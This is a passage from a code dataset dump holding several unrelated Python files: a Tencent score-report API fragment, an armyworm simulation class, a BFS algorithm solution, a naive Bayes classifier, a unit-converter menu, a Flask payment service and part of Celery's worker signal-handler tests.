uri)\n\n def update_wx_score(self, wx_access_token, openid, score):\n \"\"\"\n 更新微信用户游戏分数\n \"\"\"\n uri = '/game/score?access_token=%s' % wx_access_token\n data = json.dumps({\"openid\":openid, \"score\":score, \"expires\":0})\n self.http.request(self.wx_rank_host, uri, data, json_type=True)\n \n","repo_name":"isphinx/traversing","sub_path":"sdk/api/tencent/report_api.py","file_name":"report_api.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9643459596","text":"import dataclasses as dclass\n\nimport source.hint as hint\nimport source.keyword as keyword\n\n\n@dclass.dataclass\nclass Target(object):\n \"\"\"\n Class to handle target consumption\n\n Variables:\n loss: mathematical function for if we lose/keep the target\n\n Methods:\n consume: run the behavior\n\n Constructors:\n setup: setup class\n \"\"\"\n\n loss: hint.loss = None\n\n @property\n def _use_loss(self) -> bool:\n \"\"\"Determine if we use the loss model\"\"\"\n\n return self.loss is not None\n\n def _keep_target(self, larva: hint.larva,\n target: hint.target) -> bool:\n \"\"\"\n Determine if we loose the target\n\n Args:\n larva: the larva in question\n target: the larva's target\n\n Returns:\n if the larva moves away from the target\n \"\"\"\n\n if self._use_loss:\n return self.loss(larva.mass, target.mass,\n larva.genotype, target.agent_key)\n else:\n return False\n\n @staticmethod\n def _consume_target(larva: hint.larva,\n target: hint.target) -> None:\n \"\"\"\n Consume the target\n\n Args:\n larva: the larva in question\n target: the larva's target\n\n Effects:\n run consume behavior on target\n \"\"\"\n\n if target.agent_key == keyword.egg_mass:\n larva.consume_egg(target)\n else:\n larva.consume_larva(target)\n\n def consume(self, larva: hint.larva) -> None:\n \"\"\"\n Run a target consume behavior on the larva's target\n\n Args:\n larva: the larva in question\n\n Effects:\n run target consumption\n \"\"\"\n\n target = larva.target\n\n if self._keep_target(larva, target):\n self._consume_target(larva, target)\n else:\n larva.target = None\n\n @classmethod\n def setup(cls, **kwargs) -> 'Target':\n \"\"\"\n Setup the class\n\n Args:\n **kwargs: simulation input models\n\n Returns:\n setup class\n \"\"\"\n\n if keyword.loss in kwargs:\n return cls(kwargs[keyword.loss])\n else:\n return cls()\n","repo_name":"WilliamJamieson/FallArmyworm_Thesis","sub_path":"source/forage/target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19860289419","text":"import sys\nsys.stdin = open(\"daily/230405/2468.txt\")\nfrom collections import deque\ndef bfs(i,j,k):\n global cnt\n cnt += 1\n q = deque([])\n v[i][j] = 1\n q.append((i,j))\n while q:\n ci,cj = q.popleft()\n for di, dj in ((0, 1), (0, -1), (1, 0), (-1, 0)):\n ni, nj = ci+di, cj+dj\n if 0<=ni k and v[ni][nj] == 0:\n q.append((ni, nj))\n v[ni][nj] = 1\n\nnum = int(input())\nans = 0\narr = [list(map(int, input().split())) for _ in range(num)]\nmax_v = max(map(max, arr))\nfor k in range(max_v+1):\n cnt = 0\n v = [[0] * num for _ in range(num)]\n for i in range(num):\n for j in range(num):\n if arr[i][j] >k and v[i][j] == 0:\n bfs(i,j,k)\n if cnt>ans:\n ans=cnt\nprint(ans)","repo_name":"dong-3-hoon/Algo","sub_path":"daily/2304/230405/baek_2468_saftyarea.py","file_name":"baek_2468_saftyarea.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74244179608","text":"# imported packages\nfrom model import *\nfrom numpy import log, inf\nimport os\n\n\n# this method gets the testing data\ndef get_testing_title(data, year='2019'):\n testing_year = []\n testing_titles = []\n # get raw testing title from data + convert to lowercase\n for d in data:\n if d['year'] == year:\n testing_year.append(([d.get('Title').lower()], d.get('Post Type')))\n testing_titles.append(d.get('Title').lower())\n return testing_year, testing_titles\n\n\n# this method cleans the tokenized data\ndef clean_testing_data(raw_data):\n # tokenize by removing white lines\n tokens = tokenize_data(raw_data)\n # remove punctuation from tokens\n no_punctuation_tokens, _ = remove_punctuation(tokens)\n # remove non alphabetic tokens\n alpha_tokens = [word for word in no_punctuation_tokens if word.isalpha()]\n return alpha_tokens\n\n\n# this method smooth (0.5) words not in vocabulary\ndef get_unknown_smooth_prob(class_words_count, vocab_size):\n # prob = round(0.5 / (class_words_count + (0.5 * vocab_size)), 6)\n prob = 0.5 / (class_words_count + (0.5 * vocab_size))\n return prob\n\n\n# this method compute the score for each title\ndef get_score(test_titles, p_class, class_word_pob, class_words_count, vocab_size, class_type):\n # handle divide by zero runtime warning\n # score(class) = log(p(class)) + log(p(first word | class)) + ... + log(p(last word | class))\n class_score_list = []\n for title in test_titles:\n class_score = log(p_class) if p_class > 0 else -inf\n for i in range(len(title)):\n if class_word_pob.get(title[i]):\n class_score += log(class_word_pob.get(title[i]))\n else:\n class_score += log(get_unknown_smooth_prob(class_words_count, vocab_size))\n class_score_list.append(class_score)\n # print(class_type, 'score:', class_score_list)\n return class_score_list\n\n\n# this method returns the max class score\ndef get_max_score(story, ask, show, poll):\n return max([story, ask, show, poll])\n\n\n# this method computes max score\ndef compute_max_scores(test_score_df):\n max_scores = []\n for i in range(len(test_score_df)):\n # score for each class\n story_score = test_score_df.get('story')[i]\n ask_score = test_score_df.get('ask_hn')[i]\n show_score = test_score_df.get('show_hn')[i]\n poll_score = test_score_df.get('poll')[i]\n # store max score in list\n max_scores.append(get_max_score(story_score, ask_score, show_score, poll_score))\n test_score_df['max_score'] = max_scores # add max_score column to df\n return max_scores\n\n\n# this method set classified label\ndef set_classify_label(test_score_df, max_scores):\n classify_label = []\n for i in range(len(test_score_df)):\n if max_scores[i] == test_score_df.get('story')[i]:\n classify_label.append('story')\n elif max_scores[i] == test_score_df.get('ask_hn')[i]:\n classify_label.append('ask_hn')\n elif max_scores[i] == test_score_df.get('show_hn')[i]:\n classify_label.append('show_hn')\n else:\n classify_label.append('poll')\n test_score_df['classify_label'] = classify_label # add classify_label column to df\n return classify_label\n\n\n# this method check if classification is right of wrong\ndef check_classification(test_score_df):\n classify_result = []\n for i in range(len(test_score_df)):\n # compare actual label and classified label\n classify_result.append('right') \\\n if test_score_df.get('actual_label')[i] == test_score_df.get('classify_label')[i] \\\n else classify_result.append('wrong')\n test_score_df['classify_result'] = classify_result # add classify_result column to df\n return classify_result\n\n\n# this method computes the number of right and wrong\ndef get_number_right_wrong(testing_score_df):\n right_count = wrong_count = 0\n for r in testing_score_df['classify_result'].values:\n if r == 'right':\n right_count += 1\n else:\n wrong_count += 1\n print('right: ', right_count, 'wrong: ', wrong_count)\n return right_count, wrong_count\n\n\n# this method creates baseline-result.txt file\ndef create_baseline(baseline_file, test_score_df, test_titles, classify_label,\n story_scores, ask_scores, show_scores, poll_scores,\n actual_labels, classify_result):\n os.makedirs(os.path.dirname('./output/'), exist_ok=True) # create output directory if doesn't exist\n baseline_file_path = './output/'+baseline_file\n with open(baseline_file_path, 'w') as f:\n for i in range(len(test_score_df)):\n baseline = (str(i + 1) + ' ' + test_titles[i] + ' ' + classify_label[i]\n + ' ' + str(story_scores[i]) + ' ' + str(ask_scores[i])\n + ' ' + str(show_scores[i]) + ' ' + str(poll_scores[i])\n + ' ' + str(actual_labels[i]) + ' ' + str(classify_result[i]) + \"\\r\")\n f.write(baseline)\n f.close()\n print('Done writing to', baseline_file)\n","repo_name":"lekside1/AI-Naive-Bayes","sub_path":"naiveBayes.py","file_name":"naiveBayes.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34468818702","text":"#create a main function that runs when this file is executed\ndef main():\n print('Hello')\n print('This program will present a variety of converters')\n print('for you to use.')\n print('--------------------------------------------')\n menu()\n\ndef menu():\n choice = '0'\n while choice == '0':\n print(\"1: Fahrenheit to Celcius\")\n print(\"2: Miles to Kilometers\")\n print(\"3: To quit\")\n choice = input(\"Please make a choice: \")\n if choice == \"3\":\n print(\"Quitting.. \")\n break\n elif choice == \"2\":\n #call the m2km function\n print('hi')\n menu()\n elif choice == \"1\":\n val = int(input('Enter a temperature'))\n cel = ftoc(val)\n print('{0} Fahrenheit = {1:.2f} Celcius'.format(val, cel))\n menu()\n else:\n print(\"I don't understand your choice.\")\n menu()\n\n\n\n#create a function to convert fahrenheit to celcius\ndef ftoc(fah):\n cel = (fah-32) * 5/9\n return cel\n\nmain()\n","repo_name":"jparlas/AFPwork","sub_path":"myFunctions.py","file_name":"myFunctions.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10874710257","text":"from app import app\nfrom app.libraries.random_string import RandomString\nfrom app.libraries.token_handler import TokenHandler\nfrom app.models.model_payment import ModelPayment\nfrom app.models.model_payment_session import ModelPaymentSession\nfrom datetime import datetime\nimport requests\n\nclass PaymentService(object):\n config = {}\n base_result = {\n 'data': None,\n 'total_data': 0\n }\n PAYMENT_CODE_LENGTH = 11\n PAYMENT_TOKEN_LENGTH = 118\n MOUNTAIN_HOST = app.environment.get('APP_MOUNTAIN_HOST')\n \n def __init__(self, config = None):\n super(PaymentService, self).__init__()\n\n if config:\n self.config = config\n\n def generate_payment_list(self, data_model = None):\n data_sql = getattr(ModelPayment(data_model), 'get_list')()\n\n raw_data = data_sql.get('data')\n\n if raw_data:\n for item_raw_data in raw_data:\n # Get payment session value\n payment_token = item_raw_data.get('payment_token')\n\n content_data_session = getattr(ModelPaymentSession(), 'get_detail_by')('token', payment_token)\n content_data_session = content_data_session.get('data')\n\n item_raw_data['is_expired'] = self.check_payment_expired(content_data_session.get('expired'))\n\n self.base_result['data'] = data_sql.get('data')\n self.base_result['total_data'] = data_sql.get('total_rows')\n\n return self.base_result\n\n def generate_payment_detail(self, columns = None, payment_code = None):\n data_sql = getattr(ModelPayment(), 'get_detail_by')(columns, payment_code)\n\n raw_data = data_sql.get('data')\n\n if raw_data:\n # Get payment session value\n payment_token = raw_data.get('payment_token')\n\n content_data_session = getattr(ModelPaymentSession(), 'get_detail_by')('token', payment_token)\n content_data_session = content_data_session.get('data')\n \n raw_data['is_expired'] = self.check_payment_expired(content_data_session.get('expired'))\n\n self.base_result['data'] = data_sql.get('data')\n self.base_result['total_data'] = data_sql.get('total_rows')\n\n return self.base_result\n\n def create_payment(self, data_model = None):\n # To Do :: Create validation here\n payment_token = self.generate_payment_token()\n data_model['payment_token'] = payment_token\n\n getattr(ModelPaymentSession(), 'create_data')({\n 'token': payment_token\n })\n\n payment_session_id = app.mysql_lastrowid\n\n payment_session_detail = getattr(ModelPaymentSession(), 'get_detail_by')('id', payment_session_id)\n payment_session_created = payment_session_detail['data']['created_at']\n \n payment_expired = TokenHandler({\n 'time_by': 'minute',\n 'time_by_value': 30,\n 'session_time': payment_session_created\n }).create_expired_time()\n\n queries = \"expired='{}'\".format(payment_expired)\n \n data_model_session = {\n 'id': payment_session_id,\n 'data': queries\n }\n\n getattr(ModelPaymentSession(), 'update_data')(data_model_session)\n\n getattr(ModelPayment(), 'create_data')(data_model)\n\n def update_payment(self, data_model = None):\n # To Do :: Create validation here\n getattr(ModelPayment(), 'update_data')(data_model)\n\n # Get detail payment \n payment_code = data_model.get('code')\n raw_payment_detail = self.generate_payment_detail('code', payment_code.upper())\n data_payment_detail = raw_payment_detail.get('data')\n\n if data_payment_detail:\n # Update booking status in mountain apps\n booking_code = data_payment_detail.get('booking_code')\n transaction_status = data_payment_detail.get('transaction_status')\n\n if booking_code:\n data_update_booking = {\n 'payment_status': transaction_status\n }\n res_update_booking = requests.put('{}/booking/{}'.format(self.MOUNTAIN_HOST, booking_code), json = data_update_booking)\n res_update_booking = res_update_booking.json()\n\n def generate_payment_code(self):\n result = RandomString({\n 'key_length': self.PAYMENT_CODE_LENGTH\n }).run()\n\n result = '{}{}{}'.format('RMNSA', result.upper(), 'PAY')\n\n return result\n\n def generate_payment_token(self):\n result = RandomString({\n 'key_length': self.PAYMENT_TOKEN_LENGTH\n }).run()\n\n return result.upper()\n\n def check_availability_payment_code(self, payment_code = None):\n availability_result = {\n 'status': 0,\n 'message': 'Available',\n 'payment_code': payment_code\n }\n\n # Check availability payment code\n data_sql = getattr(ModelPayment(), 'get_detail_by')('code', payment_code)\n\n if data_sql.get('data'):\n availability_result['status'] = 1\n availability_result['message'] = 'Not Available'\n\n self.base_result['data'] = availability_result\n self.base_result['total_data'] = data_sql.get('total_rows')\n\n return self.base_result\n\n def check_payment_expired(self, expired_time = None):\n return TokenHandler().check_expired_time(expired_time)","repo_name":"muzanella11/rimornesia-billing-backend","sub_path":"app/services/payment_service.py","file_name":"payment_service.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15964217246","text":"from __future__ import absolute_import\nfrom __future__ import with_statement\n\nimport logging\nimport os\nimport sys\n\nfrom functools import wraps\n\nfrom mock import Mock, patch\nfrom nose import SkipTest\n\nfrom billiard import current_process\nfrom kombu import Exchange, Queue\n\nfrom celery import Celery\nfrom celery import platforms\nfrom celery import signals\nfrom celery import current_app\nfrom celery.apps import worker as cd\nfrom celery.bin.celeryd import WorkerCommand, main as celeryd_main\nfrom celery.exceptions import ImproperlyConfigured, SystemTerminate\nfrom celery.task import trace\nfrom celery.utils.log import ensure_process_aware_logger\nfrom celery.worker import state\n\nfrom celery.tests.utils import (\n AppCase,\n WhateverIO,\n skip_if_pypy,\n skip_if_jython,\n)\n\nensure_process_aware_logger()\n\n\nclass WorkerAppCase(AppCase):\n\n def tearDown(self):\n super(WorkerAppCase, self).tearDown()\n trace.reset_worker_optimizations()\n\n\ndef disable_stdouts(fun):\n\n @wraps(fun)\n def disable(*args, **kwargs):\n prev_out, prev_err = sys.stdout, sys.stderr\n prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__\n sys.stdout = sys.__stdout__ = WhateverIO()\n sys.stderr = sys.__stderr__ = WhateverIO()\n try:\n return fun(*args, **kwargs)\n finally:\n sys.stdout = prev_out\n sys.stderr = prev_err\n sys.__stdout__ = prev_rout\n sys.__stderr__ = prev_rerr\n\n return disable\n\n\nclass _WorkController(object):\n\n def __init__(self, *args, **kwargs):\n pass\n\n def start(self):\n pass\n\n\nclass Worker(cd.Worker):\n WorkController = _WorkController\n\n def __init__(self, *args, **kwargs):\n super(Worker, self).__init__(*args, **kwargs)\n self.redirect_stdouts = False\n\n\nclass test_Worker(WorkerAppCase):\n\n Worker = Worker\n\n def teardown(self):\n self.app.conf.CELERY_INCLUDE = ()\n\n @disable_stdouts\n def test_queues_string(self):\n celery = Celery(set_as_current=False)\n worker = celery.Worker(queues='foo,bar,baz')\n worker.init_queues()\n self.assertEqual(worker.use_queues, ['foo', 'bar', 'baz'])\n self.assertTrue('foo' in celery.amqp.queues)\n\n @disable_stdouts\n def test_cpu_count(self):\n celery = Celery(set_as_current=False)\n with patch('celery.apps.worker.cpu_count') as cpu_count:\n cpu_count.side_effect = NotImplementedError()\n worker = celery.Worker(concurrency=None)\n self.assertEqual(worker.concurrency, 2)\n worker = celery.Worker(concurrency=5)\n self.assertEqual(worker.concurrency, 5)\n\n @disable_stdouts\n def test_windows_B_option(self):\n celery = Celery(set_as_current=False)\n celery.IS_WINDOWS = True\n with self.assertRaises(SystemExit):\n WorkerCommand(app=celery).run(beat=True)\n\n def test_setup_concurrency_very_early(self):\n x = WorkerCommand()\n x.run = Mock()\n with self.assertRaises(ImportError):\n x.execute_from_commandline(['celeryd', '-P', 'xyzybox'])\n\n @disable_stdouts\n def test_invalid_loglevel_gives_error(self):\n x = WorkerCommand(app=Celery(set_as_current=False))\n with self.assertRaises(SystemExit):\n x.run(loglevel='GRIM_REAPER')\n\n def test_no_loglevel(self):\n app = Celery(set_as_current=False)\n app.Worker = Mock()\n WorkerCommand(app=app).run(loglevel=None)\n\n def test_tasklist(self):\n celery = Celery(set_as_current=False)\n worker = celery.Worker()\n self.assertTrue(worker.app.tasks)\n self.assertTrue(worker.app.finalized)\n self.assertTrue(worker.tasklist(include_builtins=True))\n worker.tasklist(include_builtins=False)\n\n def test_extra_info(self):\n celery = Celery(set_as_current=False)\n worker = celery.Worker()\n worker.loglevel = logging.WARNING\n self.assertFalse(worker.extra_info())\n worker.loglevel = logging.INFO\n self.assertTrue(worker.extra_info())\n\n @disable_stdouts\n def test_loglevel_string(self):\n worker = self.Worker(loglevel='INFO')\n self.assertEqual(worker.loglevel, logging.INFO)\n\n def test_run_worker(self):\n handlers = {}\n\n class Signals(platforms.Signals):\n\n def __setitem__(self, sig, handler):\n handlers[sig] = handler\n\n p = platforms.signals\n platforms.signals = Signals()\n try:\n w = self.Worker()\n w._isatty = False\n w.run_worker()\n for sig in 'SIGINT', 'SIGHUP', 'SIGTERM':\n self.assertIn(sig, handlers)\n\n handlers.clear()\n w = self.Worker()\n w._isatty = True\n w.run_worker()\n for sig in 'SIGINT', 'SIGTERM':\n self.assertIn(sig, handlers)\n self.assertNotIn('SIGHUP', handlers)\n finally:\n platforms.signals = p\n\n @disable_stdouts\n def test_startup_info(self):\n worker = self.Worker()\n worker.run()\n self.assertTrue(worker.startup_info())\n worker.loglevel = logging.DEBUG\n self.assertTrue(worker.startup_info())\n worker.loglevel = logging.INFO\n self.assertTrue(worker.startup_info())\n worker.autoscale = 13, 10\n self.assertTrue(worker.startup_info())\n\n worker = self.Worker(queues='foo,bar,baz,xuzzy,do,re,mi')\n app = worker.app\n prev, app.loader = app.loader, Mock()\n try:\n app.loader.__module__ = 'acme.baked_beans'\n self.assertTrue(worker.startup_info())\n finally:\n app.loader = prev\n\n prev, app.loader = app.loader, Mock()\n try:\n app.loader.__module__ = 'celery.loaders.foo'\n self.assertTrue(worker.startup_info())\n finally:\n app.loader = prev\n\n from celery.loaders.app import AppLoader\n prev, app.loader = app.loader, AppLoader()\n try:\n self.assertTrue(worker.startup_info())\n finally:\n app.loader = prev\n\n worker.send_events = True\n self.assertTrue(worker.startup_info())\n\n # test when there are too few output lines\n # to draft the ascii art onto\n prev, cd.ARTLINES = cd.ARTLINES, ['the quick brown fox']\n self.assertTrue(worker.startup_info())\n\n @disable_stdouts\n def test_run(self):\n self.Worker().run()\n self.Worker(purge=True).run()\n worker = self.Worker()\n worker.run()\n\n prev, cd.IGNORE_ERRORS = cd.IGNORE_ERRORS, (KeyError, )\n try:\n worker.run_worker = Mock()\n worker.run_worker.side_effect = KeyError()\n worker.run()\n finally:\n cd.IGNORE_ERRORS = prev\n\n @disable_stdouts\n def test_purge_messages(self):\n self.Worker().purge_messages()\n\n @disable_stdouts\n def test_init_queues(self):\n app = current_app\n c = app.conf\n p, app.amqp.queues = app.amqp.queues, app.amqp.Queues({\n 'celery': {'exchange': 'celery',\n 'routing_key': 'celery'},\n 'video': {'exchange': 'video',\n 'routing_key': 'video'}})\n try:\n worker = self.Worker(queues=['video'])\n worker.init_queues()\n self.assertIn('video', app.amqp.queues)\n self.assertIn('video', app.amqp.queues.consume_from)\n self.assertIn('celery', app.amqp.queues)\n self.assertNotIn('celery', app.amqp.queues.consume_from)\n\n c.CELERY_CREATE_MISSING_QUEUES = False\n del(app.amqp.queues)\n with self.assertRaises(ImproperlyConfigured):\n self.Worker(queues=['image']).init_queues()\n del(app.amqp.queues)\n c.CELERY_CREATE_MISSING_QUEUES = True\n worker = self.Worker(queues=['image'])\n worker.init_queues()\n self.assertIn('image', app.amqp.queues.consume_from)\n self.assertEqual(Queue('image', Exchange('image'),\n routing_key='image'), app.amqp.queues['image'])\n finally:\n app.amqp.queues = p\n\n @disable_stdouts\n def test_autoscale_argument(self):\n worker1 = self.Worker(autoscale='10,3')\n self.assertListEqual(worker1.autoscale, [10, 3])\n worker2 = self.Worker(autoscale='10')\n self.assertListEqual(worker2.autoscale, [10, 0])\n\n def test_include_argument(self):\n worker1 = self.Worker(include='some.module')\n self.assertListEqual(worker1.include, ['some.module'])\n worker2 = self.Worker(include='some.module,another.package')\n self.assertListEqual(\n worker2.include,\n ['some.module', 'another.package'],\n )\n self.Worker(include=['os', 'sys'])\n\n @disable_stdouts\n def test_unknown_loglevel(self):\n with self.assertRaises(SystemExit):\n WorkerCommand(app=self.app).run(loglevel='ALIEN')\n worker1 = self.Worker(loglevel=0xFFFF)\n self.assertEqual(worker1.loglevel, 0xFFFF)\n\n def test_warns_if_running_as_privileged_user(self):\n app = current_app\n if app.IS_WINDOWS:\n raise SkipTest('Not applicable on Windows')\n\n def getuid():\n return 0\n\n prev, os.getuid = os.getuid, getuid\n try:\n with self.assertWarnsRegex(\n RuntimeWarning,\n r'superuser privileges is discouraged'):\n worker = self.Worker()\n worker.run()\n finally:\n os.getuid = prev\n\n @disable_stdouts\n def test_redirect_stdouts(self):\n worker = self.Worker()\n worker.redirect_stdouts = False\n worker.setup_logging()\n with self.assertRaises(AttributeError):\n sys.stdout.logger\n\n def test_redirect_stdouts_already_handled(self):\n logging_setup = [False]\n\n @signals.setup_logging.connect\n def on_logging_setup(**kwargs):\n logging_setup[0] = True\n\n try:\n worker = self.Worker()\n worker.app.log.__class__._setup = False\n worker.setup_logging()\n self.assertTrue(logging_setup[0])\n with self.assertRaises(AttributeError):\n sys.stdout.logger\n finally:\n signals.setup_logging.disconnect(on_logging_setup)\n\n @disable_stdouts\n def test_platform_tweaks_osx(self):\n\n class OSXWorker(Worker):\n proxy_workaround_installed = False\n\n def osx_proxy_detection_workaround(self):\n self.proxy_workaround_installed = True\n\n worker = OSXWorker(redirect_stdouts=False)\n\n def install_HUP_nosupport(controller):\n controller.hup_not_supported_installed = True\n\n class Controller(object):\n pass\n\n prev = cd.install_HUP_not_supported_handler\n cd.install_HUP_not_supported_handler = install_HUP_nosupport\n try:\n worker.app.IS_OSX = True\n controller = Controller()\n worker.install_platform_tweaks(controller)\n self.assertTrue(controller.hup_not_supported_installed)\n self.assertTrue(worker.proxy_workaround_installed)\n finally:\n cd.install_HUP_not_supported_handler = prev\n\n @disable_stdouts\n def test_general_platform_tweaks(self):\n\n restart_worker_handler_installed = [False]\n\n def install_worker_restart_handler(worker):\n restart_worker_handler_installed[0] = True\n\n class Controller(object):\n pass\n\n prev = cd.install_worker_restart_handler\n cd.install_worker_restart_handler = install_worker_restart_handler\n try:\n worker = self.Worker()\n worker.app.IS_OSX = False\n worker.install_platform_tweaks(Controller())\n self.assertTrue(restart_worker_handler_installed[0])\n finally:\n cd.install_worker_restart_handler = prev\n\n @disable_stdouts\n def test_on_consumer_ready(self):\n worker_ready_sent = [False]\n\n @signals.worker_ready.connect\n def on_worker_ready(**kwargs):\n worker_ready_sent[0] = True\n\n self.Worker().on_consumer_ready(object())\n self.assertTrue(worker_ready_sent[0])\n\n\nclass test_funs(WorkerAppCase):\n\n def test_active_thread_count(self):\n self.assertTrue(cd.active_thread_count())\n\n @disable_stdouts\n def test_set_process_status(self):\n try:\n __import__('setproctitle')\n except ImportError:\n raise SkipTest('setproctitle not installed')\n worker = Worker(hostname='xyzza')\n prev1, sys.argv = sys.argv, ['Arg0']\n try:\n st = worker.set_process_status('Running')\n self.assertIn('celeryd', st)\n self.assertIn('xyzza', st)\n self.assertIn('Running', st)\n prev2, sys.argv = sys.argv, ['Arg0', 'Arg1']\n try:\n st = worker.set_process_status('Running')\n self.assertIn('celeryd', st)\n self.assertIn('xyzza', st)\n self.assertIn('Running', st)\n self.assertIn('Arg1', st)\n finally:\n sys.argv = prev2\n finally:\n sys.argv = prev1\n\n @disable_stdouts\n def test_parse_options(self):\n cmd = WorkerCommand()\n cmd.app = current_app\n opts, args = cmd.parse_options('celeryd', ['--concurrency=512'])\n self.assertEqual(opts.concurrency, 512)\n\n @disable_stdouts\n def test_main(self):\n p, cd.Worker = cd.Worker, Worker\n s, sys.argv = sys.argv, ['celeryd', '--discard']\n try:\n celeryd_main()\n finally:\n cd.Worker = p\n sys.argv = s\n\n\nclass test_signal_handlers(WorkerAppCase):\n\n class _Worker(object):\n stopped = False\n terminated = False\n\n def stop(self, in_sighandler=False):\n self.stopped = True\n\n def terminate(self, in_sighandler=False):\n self.terminated = True\n\n def psig(self, fun, *args, **kwargs):\n handlers = {}\n\n class Signals(platforms.Signals):\n def __setitem__(self, sig, handler):\n handlers[sig] = handler\n\n p, platforms.signals = platforms.signals, Signals()\n try:\n fun(*args, **kwargs)\n return handlers\n finally:\n platforms.signals = p\n\n @disable_stdouts\n def test_worker_int_handler(self):\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_int_handler, worker)\n next_handlers = {}\n state.should_stop = False\n state.should_terminate = False\n\n class Signals(platforms.Signals):\n\n def __setitem__(self, sig, handler):\n next_handlers[sig] = handler\n\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n p, platforms.signals = platforms.signals, Signals()\n try:\n handlers['SIGINT']('SIGINT', object())\n self.assertTrue(state.should_stop)\n finally:\n platforms.signals = p\n state.should_stop = False\n\n try:\n next_handlers['SIGINT']('SIGINT', object())\n self.assertTrue(state.should_terminate)\n finally:\n state.should_terminate = False\n\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n p, platforms.signals = platforms.signals, Signals()\n try:\n with self.assertRaises(SystemExit):\n handlers['SIGINT']('SIGINT', object())\n finally:\n platforms.signals = p\n\n with self.assertRaises(SystemTerminate):\n next_handlers['SIGINT']('SIGINT', object())\n\n @disable_stdouts\n def test_worker_int_handler_only_stop_MainProcess(self):\n try:\n import _multiprocessing # noqa\n except ImportError:\n raise SkipTest('only relevant for multiprocessing')\n process = current_process()\n name, process.name = process.name, 'OtherProcess'\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n try:\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_int_handler, worker)\n handlers['SIGINT']('SIGINT', object())\n self.assertTrue(state.should_stop)\n finally:\n process.name = name\n state.should_stop = False\n\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n try:\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_int_handler, worker)\n with self.assertRaises(SystemExit):\n handlers['SIGINT']('SIGINT', object())\n finally:\n process.name = name\n state.should_stop = False\n\n @disable_stdouts\n def test_install_HUP_not_supported_handler(self):\n worker = self._Worker()\n handlers = self.psig(cd.install_HUP_not_supported_handler, worker)\n handlers['SIGHUP']('SIGHUP', object())\n\n @disable_stdouts\n def test_worker_term_hard_handler_only_stop_MainProcess(self):\n try:\n import _multiprocessing # noqa\n except ImportError:\n raise SkipTest('only relevant for multiprocessing')\n process = current_process()\n name, process.name = process.name, 'OtherProcess'\n try:\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(\n cd.install_worker_term_hard_handler, worker)\n try:\n handlers['SIGQUIT']('SIGQUIT', object())\n self.assertTrue(state.should_terminate)\n finally:\n state.should_terminate = False\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(\n cd.install_worker_term_hard_handler, worker)\n with self.assertRaises(SystemTerminate):\n handlers['SIGQUIT']('SIGQUIT', object())\n finally:\n process.name = name\n\n @disable_stdouts\n def test_worker_term_handler_when_threads(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n try:\n handlers['SIGTERM']('SIGTERM', object())\n self.assertTrue(state.should_stop)\n finally:\n state.should_stop = False\n\n @disable_stdouts\n def test_worker_term_handler_when_single_thread(self):\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n try:\n with self.assertRaises(SystemExit):\n handlers['SIGTERM']('SIGTERM', object())\n finally:\n state.should_stop = False\n\n @patch('sys.__stderr__')\n @skip_if_pypy\n @skip_if_jython\n def test_worker_cry_handler(self, stderr):\n if sys.version_info > (2, 5):\n handlers = self.psig(cd.install_cry_handler)\n self.assertIsNone(handlers['SIGUSR1']('SIGUSR1', object()))\n self.assertTrue(stderr.write.called)\n else:\n raise SkipTest('Needs Python 2.5 or later')\n\n @disable_stdouts\n def test_worker_term_handler_only_stop_MainProcess(self):\n try:\n import _multiprocessing # noqa\n except ImportError:\n raise SkipTest('only relevant for multiprocessing')\n process = current_process()\n name, process.name = process.name, 'OtherProcess'\n try:\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 3\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n handlers['SIGTERM']('SIGTERM', object())\n self.assertTrue(state.should_stop)\n with patch('celery.apps.worker.active_thread_count') as c:\n c.return_value = 1\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_term_handler, worker)\n with self.assertRaises(SystemExit):\n handlers['SIGTERM']('SIGTERM', object())\n finally:\n process.name = name\n state.should_stop = False\n\n @disable_stdouts\n @patch('atexit.register')\n @patch('os.fork')\n @patch('os.close')\n def test_worker_restart_handler(self, _close, fork, register):\n fork.return_value = 0\n if getattr(os, 'execv', None) is None:\n raise SkipTest('platform does not have excv')\n argv = []\n\n def _execv(*args):\n argv.extend(args)\n\n execv, os.execv = os.execv, _execv\n try:\n worker = self._Worker()\n handlers = self.psig(cd.install_worker_restart_handler, worker)\n handlers['SIGHUP']('SIGHUP', object())\n self.assertTrue(state.should_stop)\n self.assertTrue(register.called)\n callback = register.call_args[0][0]\n callback()\n self.assertTrue(argv)\n argv[:] = []\n fork.return_value = 1\n callback()\n self.assertFalse(argv)\n finally:\n os.execv = execv\n state.should_stop = False\n\n @disable_stdouts\n def test_worker_term_hard_handler_when_threaded(self):\n with patch('celery.apps.worker.active_thread_count') as 